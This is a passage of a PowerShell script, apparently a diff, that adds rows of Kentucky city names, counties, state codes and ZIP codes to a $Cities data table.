+ $null = $Cities.Rows.Add("Finchville","Shelby","Kentucky","KY","21","40022") + $null = $Cities.Rows.Add("Fisherville","Jefferson","Kentucky","KY","21","40023") + $null = $Cities.Rows.Add("Goshen","Oldham","Kentucky","KY","21","40026") + $null = $Cities.Rows.Add("La grange","Oldham","Kentucky","KY","21","40031") + $null = $Cities.Rows.Add("Lebanon","Marion","Kentucky","KY","21","40033") + $null = $Cities.Rows.Add("Lockport","Henry","Kentucky","KY","21","40036") + $null = $Cities.Rows.Add("Loretto","Marion","Kentucky","KY","21","40037") + $null = $Cities.Rows.Add("Mackville","Washington","Kentucky","KY","21","40040") + $null = $Cities.Rows.Add("Milton","Trimble","Kentucky","KY","21","40045") + $null = $Cities.Rows.Add("Mount eden","Spencer","Kentucky","KY","21","40046") + $null = $Cities.Rows.Add("Mount washington","Bullitt","Kentucky","KY","21","40047") + $null = $Cities.Rows.Add("New castle","Henry","Kentucky","KY","21","40050") + $null = $Cities.Rows.Add("Trappist","Nelson","Kentucky","KY","21","40051") + $null = $Cities.Rows.Add("New hope","Nelson","Kentucky","KY","21","40052") + $null = $Cities.Rows.Add("Pendleton","Oldham","Kentucky","KY","21","40055") + $null = $Cities.Rows.Add("Pewee valley","Oldham","Kentucky","KY","21","40056") + $null = $Cities.Rows.Add("Cropper","Henry","Kentucky","KY","21","40057") + $null = $Cities.Rows.Add("Port royal","Henry","Kentucky","KY","21","40058") + $null = $Cities.Rows.Add("Prospect","Jefferson","Kentucky","KY","21","40059") + $null = $Cities.Rows.Add("Raywick","Marion","Kentucky","KY","21","40060") + $null = $Cities.Rows.Add("Saint francis","Marion","Kentucky","KY","21","40062") + $null = $Cities.Rows.Add("Shelbyville","Shelby","Kentucky","KY","21","40065") + $null = $Cities.Rows.Add("Simpsonville","Shelby","Kentucky","KY","21","40067") + $null = $Cities.Rows.Add("Smithfield","Henry","Kentucky","KY","21","40068") + $null = $Cities.Rows.Add("Maud","Washington","Kentucky","KY","21","40069") + $null = $Cities.Rows.Add("Sulphur","Henry","Kentucky","KY","21","40070") + $null = $Cities.Rows.Add("Taylorsville","Spencer","Kentucky","KY","21","40071") + $null = $Cities.Rows.Add("Waddy","Shelby","Kentucky","KY","21","40076") + $null = $Cities.Rows.Add("Westport","Oldham","Kentucky","KY","21","40077") + $null = $Cities.Rows.Add("Willisburg","Washington","Kentucky","KY","21","40078") + $null = $Cities.Rows.Add("Zcta 400hh","Henry","Kentucky","KY","21","400HH") + $null = $Cities.Rows.Add("Battletown","Meade","Kentucky","KY","21","40104") + $null = $Cities.Rows.Add("Boston","Nelson","Kentucky","KY","21","40107") + $null = $Cities.Rows.Add("Brandenburg","Meade","Kentucky","KY","21","40108") + $null = $Cities.Rows.Add("Brooks","Bullitt","Kentucky","KY","21","40109") + $null = $Cities.Rows.Add("Cloverport","Breckinridge","Kentucky","KY","21","40111") + $null = $Cities.Rows.Add("Custer","Breckinridge","Kentucky","KY","21","40115") + $null = $Cities.Rows.Add("Ekron","Meade","Kentucky","KY","21","40117") + $null = $Cities.Rows.Add("Fairdale","Jefferson","Kentucky","KY","21","40118") + $null = $Cities.Rows.Add("Glen dean","Grayson","Kentucky","KY","21","40119") + $null = $Cities.Rows.Add("Fort knox","Hardin","Kentucky","KY","21","40121") + $null = $Cities.Rows.Add("Garfield","Breckinridge","Kentucky","KY","21","40140") + $null = $Cities.Rows.Add("Guston","Meade","Kentucky","KY","21","40142") + $null = $Cities.Rows.Add("Mooleyville","Breckinridge","Kentucky","KY","21","40143") + $null = $Cities.Rows.Add("Locust hill","Breckinridge","Kentucky","KY","21","40144") + $null = $Cities.Rows.Add("Hudson","Breckinridge","Kentucky","KY","21","40145") + $null = $Cities.Rows.Add("Irvington","Breckinridge","Kentucky","KY","21","40146") + $null = $Cities.Rows.Add("Lebanon junction","Bullitt","Kentucky","KY","21","40150") + $null = $Cities.Rows.Add("Mc daniels","Breckinridge","Kentucky","KY","21","40152") + $null = $Cities.Rows.Add("Muldraugh","Meade","Kentucky","KY","21","40155") + $null = $Cities.Rows.Add("Payneville","Meade","Kentucky","KY","21","40157") + $null = $Cities.Rows.Add("Radcliff","Hardin","Kentucky","KY","21","40160") + $null = $Cities.Rows.Add("Rineyville","Hardin","Kentucky","KY","21","40162") + $null = $Cities.Rows.Add("Se ree","Breckinridge","Kentucky","KY","21","40164") + $null = $Cities.Rows.Add("Shepherdsville","Bullitt","Kentucky","KY","21","40165") + $null = $Cities.Rows.Add("Stephensport","Breckinridge","Kentucky","KY","21","40170") + $null = $Cities.Rows.Add("Union star","Breckinridge","Kentucky","KY","21","40171") + $null = $Cities.Rows.Add("Vine grove","Hardin","Kentucky","KY","21","40175") + $null = $Cities.Rows.Add("Webster","Meade","Kentucky","KY","21","40176") + $null = $Cities.Rows.Add("West point","Hardin","Kentucky","KY","21","40177") + $null = $Cities.Rows.Add("Westview","Breckinridge","Kentucky","KY","21","40178") + $null = $Cities.Rows.Add("Zcta 401hh","Breckinridge","Kentucky","KY","21","401HH") + $null = $Cities.Rows.Add("Zcta 401xx","Bullitt","Kentucky","KY","21","401XX") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40202") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40203") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40204") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40205") + $null = $Cities.Rows.Add("Saint matthews","Jefferson","Kentucky","KY","21","40206") + $null = $Cities.Rows.Add("Saint matthews","Jefferson","Kentucky","KY","21","40207") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40208") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40209") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40210") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40211") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40212") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40213") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40214") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40215") + $null = $Cities.Rows.Add("Shively","Jefferson","Kentucky","KY","21","40216") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40217") + $null = $Cities.Rows.Add("Buechel","Jefferson","Kentucky","KY","21","40218") + $null = $Cities.Rows.Add("Okolona","Jefferson","Kentucky","KY","21","40219") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40220") + $null = $Cities.Rows.Add("Lyndon","Jefferson","Kentucky","KY","21","40222") + $null = $Cities.Rows.Add("Anchorage","Jefferson","Kentucky","KY","21","40223") + $null = $Cities.Rows.Add("Buechel","Jefferson","Kentucky","KY","21","40228") + $null = $Cities.Rows.Add("Okolona","Jefferson","Kentucky","KY","21","40229") + $null = $Cities.Rows.Add("Lyndon","Jefferson","Kentucky","KY","21","40241") + $null = $Cities.Rows.Add("Lyndon","Jefferson","Kentucky","KY","21","40242") + $null = $Cities.Rows.Add("Middletown","Jefferson","Kentucky","KY","21","40243") + $null = $Cities.Rows.Add("Louisville","Jefferson","Kentucky","KY","21","40245") + $null = $Cities.Rows.Add("Pleasure ridge p","Jefferson","Kentucky","KY","21","40258") + $null = $Cities.Rows.Add("Valley station","Jefferson","Kentucky","KY","21","40272") + $null = $Cities.Rows.Add("Fern creek","Jefferson","Kentucky","KY","21","40291") + $null = $Cities.Rows.Add("Jeffersontown","Jefferson","Kentucky","KY","21","40299") + $null = $Cities.Rows.Add("Zcta 402hh","Jefferson","Kentucky","KY","21","402HH") + $null = $Cities.Rows.Add("Burgin","Mercer","Kentucky","KY","21","40310") + $null = $Cities.Rows.Add("Carlisle","Nicholas","Kentucky","KY","21","40311") + $null = $Cities.Rows.Add("Westbend","Powell","Kentucky","KY","21","40312") + $null = $Cities.Rows.Add("Clearfield","Rowan","Kentucky","KY","21","40313") + $null = $Cities.Rows.Add("Denniston","Menifee","Kentucky","KY","21","40316") + $null = $Cities.Rows.Add("Scranton","Menifee","Kentucky","KY","21","40322") + $null = $Cities.Rows.Add("Georgetown","Scott","Kentucky","KY","21","40324") + $null = $Cities.Rows.Add("Gravel switch","Marion","Kentucky","KY","21","40328") + $null = $Cities.Rows.Add("Cornishville","Mercer","Kentucky","KY","21","40330") + $null = $Cities.Rows.Add("Hope","Bath","Kentucky","KY","21","40334") + $null = $Cities.Rows.Add("Jinks","Estill","Kentucky","KY","21","40336") + $null = $Cities.Rows.Add("Jeffersonville","Montgomery","Kentucky","KY","21","40337") + $null = $Cities.Rows.Add("Keene","Jessamine","Kentucky","KY","21","40339") + $null = $Cities.Rows.Add("Lawrenceburg","Anderson","Kentucky","KY","21","40342") + $null = $Cities.Rows.Add("Means","Menifee","Kentucky","KY","21","40346") + $null = $Cities.Rows.Add("Midway","Woodford","Kentucky","KY","21","40347") + $null = $Cities.Rows.Add("Millersburg","Bourbon","Kentucky","KY","21","40348") + $null = $Cities.Rows.Add("Moorefield","Nicholas","Kentucky","KY","21","40350") + $null = $Cities.Rows.Add("Morehead","Rowan","Kentucky","KY","21","40351") + $null = $Cities.Rows.Add("Mount sterling","Montgomery","Kentucky","KY","21","40353") + $null = $Cities.Rows.Add("New liberty","Owen","Kentucky","KY","21","40355") + $null = $Cities.Rows.Add("Nicholasville","Jessamine","Kentucky","KY","21","40356") + $null = $Cities.Rows.Add("Olympia","Bath","Kentucky","KY","21","40358") + $null = $Cities.Rows.Add("Owenton","Owen","Kentucky","KY","21","40359") + $null = $Cities.Rows.Add("Owingsville","Bath","Kentucky","KY","21","40360") + $null = $Cities.Rows.Add("Paris","Bourbon","Kentucky","KY","21","40361") + $null = $Cities.Rows.Add("Perry park","Owen","Kentucky","KY","21","40363") + $null = $Cities.Rows.Add("Sadieville","Scott","Kentucky","KY","21","40370") + $null = $Cities.Rows.Add("Salt lick","Bath","Kentucky","KY","21","40371") + $null = $Cities.Rows.Add("Bondville","Mercer","Kentucky","KY","21","40372") + $null = $Cities.Rows.Add("Sharpsburg","Bath","Kentucky","KY","21","40374") + $null = $Cities.Rows.Add("Slade","Powell","Kentucky","KY","21","40376") + $null = $Cities.Rows.Add("Stamping ground","Scott","Kentucky","KY","21","40379") + $null = $Cities.Rows.Add("Patsey","Powell","Kentucky","KY","21","40380") + $null = $Cities.Rows.Add("Versailles","Woodford","Kentucky","KY","21","40383") + $null = $Cities.Rows.Add("Bybee","Madison","Kentucky","KY","21","40385") + $null = $Cities.Rows.Add("Korea","Menifee","Kentucky","KY","21","40387") + $null = $Cities.Rows.Add("High bridge","Jessamine","Kentucky","KY","21","40390") + $null = $Cities.Rows.Add("Winchester","Clark","Kentucky","KY","21","40391") + $null = $Cities.Rows.Add("Zcta 403hh","Anderson","Kentucky","KY","21","403HH") + $null = $Cities.Rows.Add("Moores creek","Jackson","Kentucky","KY","21","40402") + $null = $Cities.Rows.Add("Berea","Madison","Kentucky","KY","21","40403") + $null = $Cities.Rows.Add("Brodhead","Rockcastle","Kentucky","KY","21","40409") + $null = $Cities.Rows.Add("Crab orchard","Lincoln","Kentucky","KY","21","40419") + $null = $Cities.Rows.Add("Danville","Boyle","Kentucky","KY","21","40422") + $null = $Cities.Rows.Add("Hustonville","Lincoln","Kentucky","KY","21","40437") + $null = $Cities.Rows.Add("Junction city","Boyle","Kentucky","KY","21","40440") + $null = $Cities.Rows.Add("Kings mountain","Lincoln","Kentucky","KY","21","40442") + $null = $Cities.Rows.Add("Lancaster","Garrard","Kentucky","KY","21","40444") + $null = $Cities.Rows.Add("Livingston","Rockcastle","Kentucky","KY","21","40445") + $null = $Cities.Rows.Add("Clover bottom","Jackson","Kentucky","KY","21","40447") + $null = $Cities.Rows.Add("Mc kinney","Lincoln","Kentucky","KY","21","40448") + $null = $Cities.Rows.Add("Climax","Rockcastle","Kentucky","KY","21","40456") + $null = $Cities.Rows.Add("Orlando","Rockcastle","Kentucky","KY","21","40460") + $null = $Cities.Rows.Add("Paint lick","Garrard","Kentucky","KY","21","40461") + $null = $Cities.Rows.Add("Parksville","Boyle","Kentucky","KY","21","40464") + $null = $Cities.Rows.Add("Perryville","Boyle","Kentucky","KY","21","40468") + $null = $Cities.Rows.Add("Ravenna","Estill","Kentucky","KY","21","40472") + $null = $Cities.Rows.Add("Richmond","Madison","Kentucky","KY","21","40475") + $null = $Cities.Rows.Add("Sandgap","Jackson","Kentucky","KY","21","40481") + $null = $Cities.Rows.Add("Stanford","Lincoln","Kentucky","KY","21","40484") + $null = $Cities.Rows.Add("Elias","Jackson","Kentucky","KY","21","40486") + $null = $Cities.Rows.Add("Waneta","Jackson","Kentucky","KY","21","40488") + $null = $Cities.Rows.Add("Waynesburg","Lincoln","Kentucky","KY","21","40489") + $null = $Cities.Rows.Add("Zcta 404hh","Boyle","Kentucky","KY","21","404HH") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40502") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40503") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40504") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40505") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40507") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40508") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40509") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40510") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40511") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40513") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40514") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40515") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40516") + $null = $Cities.Rows.Add("Lexington","Fayette","Kentucky","KY","21","40517") + $null = $Cities.Rows.Add("Zcta 405hh","Fayette","Kentucky","KY","21","405HH") + $null = $Cities.Rows.Add("Hatton","Franklin","Kentucky","KY","21","40601") + $null = $Cities.Rows.Add("Corbin","Whitley","Kentucky","KY","21","40701") + $null = $Cities.Rows.Add("Symbol","Laurel","Kentucky","KY","21","40729") + $null = $Cities.Rows.Add("Emlyn","Whitley","Kentucky","KY","21","40730") + $null = $Cities.Rows.Add("Gray","Knox","Kentucky","KY","21","40734") + $null = $Cities.Rows.Add("Keavy","Laurel","Kentucky","KY","21","40737") + $null = $Cities.Rows.Add("Lily","Laurel","Kentucky","KY","21","40740") + $null = $Cities.Rows.Add("Sasser","Laurel","Kentucky","KY","21","40741") + $null = $Cities.Rows.Add("London","Laurel","Kentucky","KY","21","40744") + $null = $Cities.Rows.Add("Rockholds","Whitley","Kentucky","KY","21","40759") + $null = $Cities.Rows.Add("Siler","Whitley","Kentucky","KY","21","40763") + $null = $Cities.Rows.Add("Pleasant view","Whitley","Kentucky","KY","21","40769") + $null = $Cities.Rows.Add("Woodbine","Knox","Kentucky","KY","21","40771") + $null = $Cities.Rows.Add("Zcta 407hh","Laurel","Kentucky","KY","21","407HH") + $null = $Cities.Rows.Add("Ages brookside","Harlan","Kentucky","KY","21","40801") + $null = $Cities.Rows.Add("Asher","Leslie","Kentucky","KY","21","40803") + $null = $Cities.Rows.Add("Baxter","Harlan","Kentucky","KY","21","40806") + $null = $Cities.Rows.Add("Benham","Harlan","Kentucky","KY","21","40807") + $null = $Cities.Rows.Add("Big laurel","Harlan","Kentucky","KY","21","40808") + $null = $Cities.Rows.Add("Lewis creek","Harlan","Kentucky","KY","21","40810") + $null = $Cities.Rows.Add("Calvin","Bell","Kentucky","KY","21","40813") + $null = $Cities.Rows.Add("Crummies","Harlan","Kentucky","KY","21","40815") + $null = $Cities.Rows.Add("Chappell","Leslie","Kentucky","KY","21","40816") + $null = $Cities.Rows.Add("Coalgood","Harlan","Kentucky","KY","21","40818") + $null = $Cities.Rows.Add("Coldiron","Harlan","Kentucky","KY","21","40819") + $null = $Cities.Rows.Add("Cranks","Harlan","Kentucky","KY","21","40820") + $null = $Cities.Rows.Add("Cumberland","Harlan","Kentucky","KY","21","40823") + $null = $Cities.Rows.Add("Dayhoit","Harlan","Kentucky","KY","21","40824") + $null = $Cities.Rows.Add("Eolia","Letcher","Kentucky","KY","21","40826") + $null = $Cities.Rows.Add("Essie","Leslie","Kentucky","KY","21","40827") + $null = $Cities.Rows.Add("Louellen","Harlan","Kentucky","KY","21","40828") + $null = $Cities.Rows.Add("Gulston","Harlan","Kentucky","KY","21","40830") + $null = $Cities.Rows.Add("Chevrolet","Harlan","Kentucky","KY","21","40831") + $null = $Cities.Rows.Add("Helton","Leslie","Kentucky","KY","21","40840") + $null = $Cities.Rows.Add("Holmes mill","Harlan","Kentucky","KY","21","40843") + $null = $Cities.Rows.Add("Hoskinston","Leslie","Kentucky","KY","21","40844") + $null = $Cities.Rows.Add("Hulen","Bell","Kentucky","KY","21","40845") + $null = $Cities.Rows.Add("Kenvir","Harlan","Kentucky","KY","21","40847") + $null = $Cities.Rows.Add("Lejunior","Harlan","Kentucky","KY","21","40849") + $null = $Cities.Rows.Add("Loyall","Harlan","Kentucky","KY","21","40854") + $null = $Cities.Rows.Add("Lynch","Harlan","Kentucky","KY","21","40855") + $null = $Cities.Rows.Add("Cubage","Bell","Kentucky","KY","21","40856") + $null = $Cities.Rows.Add("Mozelle","Leslie","Kentucky","KY","21","40858") + $null = $Cities.Rows.Add("Partridge","Letcher","Kentucky","KY","21","40862") + $null = $Cities.Rows.Add("Pathfork","Harlan","Kentucky","KY","21","40863") + $null = $Cities.Rows.Add("Putney","Harlan","Kentucky","KY","21","40865") + $null = $Cities.Rows.Add("Smith","Harlan","Kentucky","KY","21","40867") + $null = $Cities.Rows.Add("Stinnett","Leslie","Kentucky","KY","21","40868") + $null = $Cities.Rows.Add("Totz","Harlan","Kentucky","KY","21","40870") + $null = $Cities.Rows.Add("Wallins creek","Harlan","Kentucky","KY","21","40873") + $null = $Cities.Rows.Add("Warbranch","Leslie","Kentucky","KY","21","40874") + $null = $Cities.Rows.Add("Zcta 408hh","Harlan","Kentucky","KY","21","408HH") + $null = $Cities.Rows.Add("Zcta 408xx","Harlan","Kentucky","KY","21","408XX") + $null = $Cities.Rows.Add("Arjay","Bell","Kentucky","KY","21","40902") + $null = $Cities.Rows.Add("Artemus","Knox","Kentucky","KY","21","40903") + $null = $Cities.Rows.Add("Bailey switch","Knox","Kentucky","KY","21","40906") + $null = $Cities.Rows.Add("Beverly","Bell","Kentucky","KY","21","40913") + $null = $Cities.Rows.Add("Big creek","Clay","Kentucky","KY","21","40914") + $null = $Cities.Rows.Add("Bimble","Knox","Kentucky","KY","21","40915") + $null = $Cities.Rows.Add("Bryants store","Knox","Kentucky","KY","21","40921") + $null = $Cities.Rows.Add("Cannon","Knox","Kentucky","KY","21","40923") + $null = $Cities.Rows.Add("Closplint","Harlan","Kentucky","KY","21","40927") + $null = $Cities.Rows.Add("Dewitt","Knox","Kentucky","KY","21","40930") + $null = $Cities.Rows.Add("Salt gum","Knox","Kentucky","KY","21","40935") + $null = $Cities.Rows.Add("Fonde","Whitley","Kentucky","KY","21","40940") + $null = $Cities.Rows.Add("Garrard","Clay","Kentucky","KY","21","40941") + $null = $Cities.Rows.Add("Girdler","Knox","Kentucky","KY","21","40943") + $null = $Cities.Rows.Add("Green road","Knox","Kentucky","KY","21","40946") + $null = $Cities.Rows.Add("Heidrick","Knox","Kentucky","KY","21","40949") + $null = $Cities.Rows.Add("Hinkle","Knox","Kentucky","KY","21","40953") + $null = $Cities.Rows.Add("Kettle island","Bell","Kentucky","KY","21","40958") + $null = $Cities.Rows.Add("Bright shade","Clay","Kentucky","KY","21","40962") + $null = $Cities.Rows.Add("Middlesboro","Bell","Kentucky","KY","21","40965") + $null = $Cities.Rows.Add("Oneida","Clay","Kentucky","KY","21","40972") + $null = $Cities.Rows.Add("Callaway","Bell","Kentucky","KY","21","40977") + $null = $Cities.Rows.Add("Roark","Leslie","Kentucky","KY","21","40979") + $null = $Cities.Rows.Add("Scalf","Knox","Kentucky","KY","21","40982") + $null = $Cities.Rows.Add("Sextons creek","Clay","Kentucky","KY","21","40983") + $null = $Cities.Rows.Add("Stoney fork","Bell","Kentucky","KY","21","40988") + $null = $Cities.Rows.Add("Trosper","Knox","Kentucky","KY","21","40995") + $null = $Cities.Rows.Add("Walker","Knox","Kentucky","KY","21","40997") + $null = $Cities.Rows.Add("Woollum","Knox","Kentucky","KY","21","40999") + $null = $Cities.Rows.Add("Zcta 409hh","Bell","Kentucky","KY","21","409HH") + $null = $Cities.Rows.Add("Alexandria","Campbell","Kentucky","KY","21","41001") + $null = $Cities.Rows.Add("Augusta","Bracken","Kentucky","KY","21","41002") + $null = $Cities.Rows.Add("Berry","Harrison","Kentucky","KY","21","41003") + $null = $Cities.Rows.Add("Brooksville","Bracken","Kentucky","KY","21","41004") + $null = $Cities.Rows.Add("Rabbit hash","Boone","Kentucky","KY","21","41005") + $null = $Cities.Rows.Add("Butler","Pendleton","Kentucky","KY","21","41006") + $null = $Cities.Rows.Add("California","Campbell","Kentucky","KY","21","41007") + $null = $Cities.Rows.Add("Carrollton","Carroll","Kentucky","KY","21","41008") + $null = $Cities.Rows.Add("Corinth","Grant","Kentucky","KY","21","41010") + $null = $Cities.Rows.Add("Covington","Kenton","Kentucky","KY","21","41011") + $null = $Cities.Rows.Add("Rouse","Kenton","Kentucky","KY","21","41014") + $null = $Cities.Rows.Add("Latonia","Kenton","Kentucky","KY","21","41015") + $null = $Cities.Rows.Add("Ludlow","Kenton","Kentucky","KY","21","41016") + $null = $Cities.Rows.Add("Dixie","Kenton","Kentucky","KY","21","41017") + $null = $Cities.Rows.Add("Erlanger","Kenton","Kentucky","KY","21","41018") + $null = $Cities.Rows.Add("Crittenden","Grant","Kentucky","KY","21","41030") + $null = $Cities.Rows.Add("Cynthiana","Harrison","Kentucky","KY","21","41031") + $null = $Cities.Rows.Add("Demossville","Pendleton","Kentucky","KY","21","41033") + $null = $Cities.Rows.Add("Dover","Mason","Kentucky","KY","21","41034") + $null = $Cities.Rows.Add("Dry ridge","Grant","Kentucky","KY","21","41035") + $null = $Cities.Rows.Add("Ewing","Fleming","Kentucky","KY","21","41039") + $null = $Cities.Rows.Add("Falmouth","Pendleton","Kentucky","KY","21","41040") + $null = $Cities.Rows.Add("Flemingsburg","Fleming","Kentucky","KY","21","41041") + $null = $Cities.Rows.Add("Florence","Boone","Kentucky","KY","21","41042") + $null = $Cities.Rows.Add("Foster","Bracken","Kentucky","KY","21","41043") + $null = $Cities.Rows.Add("Germantown","Bracken","Kentucky","KY","21","41044") + $null = $Cities.Rows.Add("Ghent","Carroll","Kentucky","KY","21","41045") + $null = $Cities.Rows.Add("Glencoe","Gallatin","Kentucky","KY","21","41046") + $null = $Cities.Rows.Add("Hebron","Boone","Kentucky","KY","21","41048") + $null = $Cities.Rows.Add("Hillsboro","Fleming","Kentucky","KY","21","41049") + $null = $Cities.Rows.Add("Independence","Kenton","Kentucky","KY","21","41051") + $null = $Cities.Rows.Add("Jonesville","Grant","Kentucky","KY","21","41052") + $null = $Cities.Rows.Add("Mays lick","Mason","Kentucky","KY","21","41055") + $null = $Cities.Rows.Add("Limestone sq","Mason","Kentucky","KY","21","41056") + $null = $Cities.Rows.Add("Melbourne","Campbell","Kentucky","KY","21","41059") + $null = $Cities.Rows.Add("Morning view","Kenton","Kentucky","KY","21","41063") + $null = $Cities.Rows.Add("Mount olivet","Robertson","Kentucky","KY","21","41064") + $null = $Cities.Rows.Add("Southgate","Campbell","Kentucky","KY","21","41071") + $null = $Cities.Rows.Add("Bellevue","Campbell","Kentucky","KY","21","41073") + $null = $Cities.Rows.Add("Dayton","Campbell","Kentucky","KY","21","41074") + $null = $Cities.Rows.Add("Fort thomas","Campbell","Kentucky","KY","21","41075") + $null = $Cities.Rows.Add("Newport","Campbell","Kentucky","KY","21","41076") + $null = $Cities.Rows.Add("Petersburg","Boone","Kentucky","KY","21","41080") + $null = $Cities.Rows.Add("Sanders","Carroll","Kentucky","KY","21","41083") + $null = $Cities.Rows.Add("Silver grove","Campbell","Kentucky","KY","21","41085") + $null = $Cities.Rows.Add("Sparta","Gallatin","Kentucky","KY","21","41086") + $null = $Cities.Rows.Add("Union","Boone","Kentucky","KY","21","41091") + $null = $Cities.Rows.Add("Verona","Boone","Kentucky","KY","21","41092") + $null = $Cities.Rows.Add("Wallingford","Fleming","Kentucky","KY","21","41093") + $null = $Cities.Rows.Add("Walton","Boone","Kentucky","KY","21","41094") + $null = $Cities.Rows.Add("Warsaw","Gallatin","Kentucky","KY","21","41095") + $null = $Cities.Rows.Add("Williamstown","Grant","Kentucky","KY","21","41097") + $null = $Cities.Rows.Add("Worthville","Owen","Kentucky","KY","21","41098") + $null = $Cities.Rows.Add("Zcta 410hh","Boone","Kentucky","KY","21","410HH") + $null = $Cities.Rows.Add("Westwood","Boyd","Kentucky","KY","21","41101") + $null = $Cities.Rows.Add("Ashland","Boyd","Kentucky","KY","21","41102") + $null = $Cities.Rows.Add("Argillite","Greenup","Kentucky","KY","21","41121") + $null = $Cities.Rows.Add("Blaine","Lawrence","Kentucky","KY","21","41124") + $null = $Cities.Rows.Add("Catlettsburg","Boyd","Kentucky","KY","21","41129") + $null = $Cities.Rows.Add("Denton","Carter","Kentucky","KY","21","41132") + $null = $Cities.Rows.Add("Head of grassy","Lewis","Kentucky","KY","21","41135") + $null = $Cities.Rows.Add("Firebrick","Lewis","Kentucky","KY","21","41137") + $null = $Cities.Rows.Add("Flatwoods","Greenup","Kentucky","KY","21","41139") + $null = $Cities.Rows.Add("Garrison","Lewis","Kentucky","KY","21","41141") + $null = $Cities.Rows.Add("Grahn","Carter","Kentucky","KY","21","41142") + $null = $Cities.Rows.Add("Fultz","Carter","Kentucky","KY","21","41143") + $null = $Cities.Rows.Add("Lynn","Greenup","Kentucky","KY","21","41144") + $null = $Cities.Rows.Add("Hitchins","Carter","Kentucky","KY","21","41146") + $null = $Cities.Rows.Add("Isonville","Elliott","Kentucky","KY","21","41149") + $null = $Cities.Rows.Add("Martha","Lawrence","Kentucky","KY","21","41159") + $null = $Cities.Rows.Add("Lawton","Carter","Kentucky","KY","21","41164") + $null = $Cities.Rows.Add("Quincy","Lewis","Kentucky","KY","21","41166") + $null = $Cities.Rows.Add("Rush","Boyd","Kentucky","KY","21","41168") + $null = $Cities.Rows.Add("Raceland","Greenup","Kentucky","KY","21","41169") + $null = $Cities.Rows.Add("Saint paul","Lewis","Kentucky","KY","21","41170") + $null = $Cities.Rows.Add("Burke","Elliott","Kentucky","KY","21","41171") + $null = $Cities.Rows.Add("South portsmouth","Greenup","Kentucky","KY","21","41174") + $null = $Cities.Rows.Add("Maloneton","Greenup","Kentucky","KY","21","41175") + $null = $Cities.Rows.Add("Trinity","Lewis","Kentucky","KY","21","41179") + $null = $Cities.Rows.Add("Webbville","Lawrence","Kentucky","KY","21","41180") + $null = $Cities.Rows.Add("Worthington","Greenup","Kentucky","KY","21","41183") + $null = $Cities.Rows.Add("Tollesboro","Lewis","Kentucky","KY","21","41189") + $null = $Cities.Rows.Add("Zcta 411hh","Boyd","Kentucky","KY","21","411HH") + $null = $Cities.Rows.Add("Adams","Lawrence","Kentucky","KY","21","41201") + $null = $Cities.Rows.Add("Beauty","Martin","Kentucky","KY","21","41203") + $null = $Cities.Rows.Add("Boons camp","Johnson","Kentucky","KY","21","41204") + $null = $Cities.Rows.Add("Davella","Martin","Kentucky","KY","21","41214") + $null = $Cities.Rows.Add("East point","Johnson","Kentucky","KY","21","41216") + $null = $Cities.Rows.Add("Elna","Johnson","Kentucky","KY","21","41219") + $null = $Cities.Rows.Add("Hagerhill","Johnson","Kentucky","KY","21","41222") + $null = $Cities.Rows.Add("Job","Martin","Kentucky","KY","21","41224") + $null = $Cities.Rows.Add("Keaton","Johnson","Kentucky","KY","21","41226") + $null = $Cities.Rows.Add("Leander","Johnson","Kentucky","KY","21","41228") + $null = $Cities.Rows.Add("Clifford","Lawrence","Kentucky","KY","21","41230") + $null = $Cities.Rows.Add("Lovely","Martin","Kentucky","KY","21","41231") + $null = $Cities.Rows.Add("Lowmansville","Lawrence","Kentucky","KY","21","41232") + $null = $Cities.Rows.Add("Meally","Johnson","Kentucky","KY","21","41234") + $null = $Cities.Rows.Add("Manila","Johnson","Kentucky","KY","21","41238") + $null = $Cities.Rows.Add("Nippa","Johnson","Kentucky","KY","21","41240") + $null = $Cities.Rows.Add("Laura","Martin","Kentucky","KY","21","41250") + $null = $Cities.Rows.Add("River","Johnson","Kentucky","KY","21","41254") + $null = $Cities.Rows.Add("Sitka","Johnson","Kentucky","KY","21","41255") + $null = $Cities.Rows.Add("Barnetts creek","Johnson","Kentucky","KY","21","41256") + $null = $Cities.Rows.Add("Stambaugh","Johnson","Kentucky","KY","21","41257") + $null = $Cities.Rows.Add("Thelma","Johnson","Kentucky","KY","21","41260") + $null = $Cities.Rows.Add("Davisport","Martin","Kentucky","KY","21","41262") + $null = $Cities.Rows.Add("Tutor key","Johnson","Kentucky","KY","21","41263") + $null = $Cities.Rows.Add("Ulysses","Lawrence","Kentucky","KY","21","41264") + $null = $Cities.Rows.Add("Van lear","Johnson","Kentucky","KY","21","41265") + $null = $Cities.Rows.Add("Hode","Martin","Kentucky","KY","21","41267") + $null = $Cities.Rows.Add("West van lear","Johnson","Kentucky","KY","21","41268") + $null = $Cities.Rows.Add("Wittensville","Johnson","Kentucky","KY","21","41274") + $null 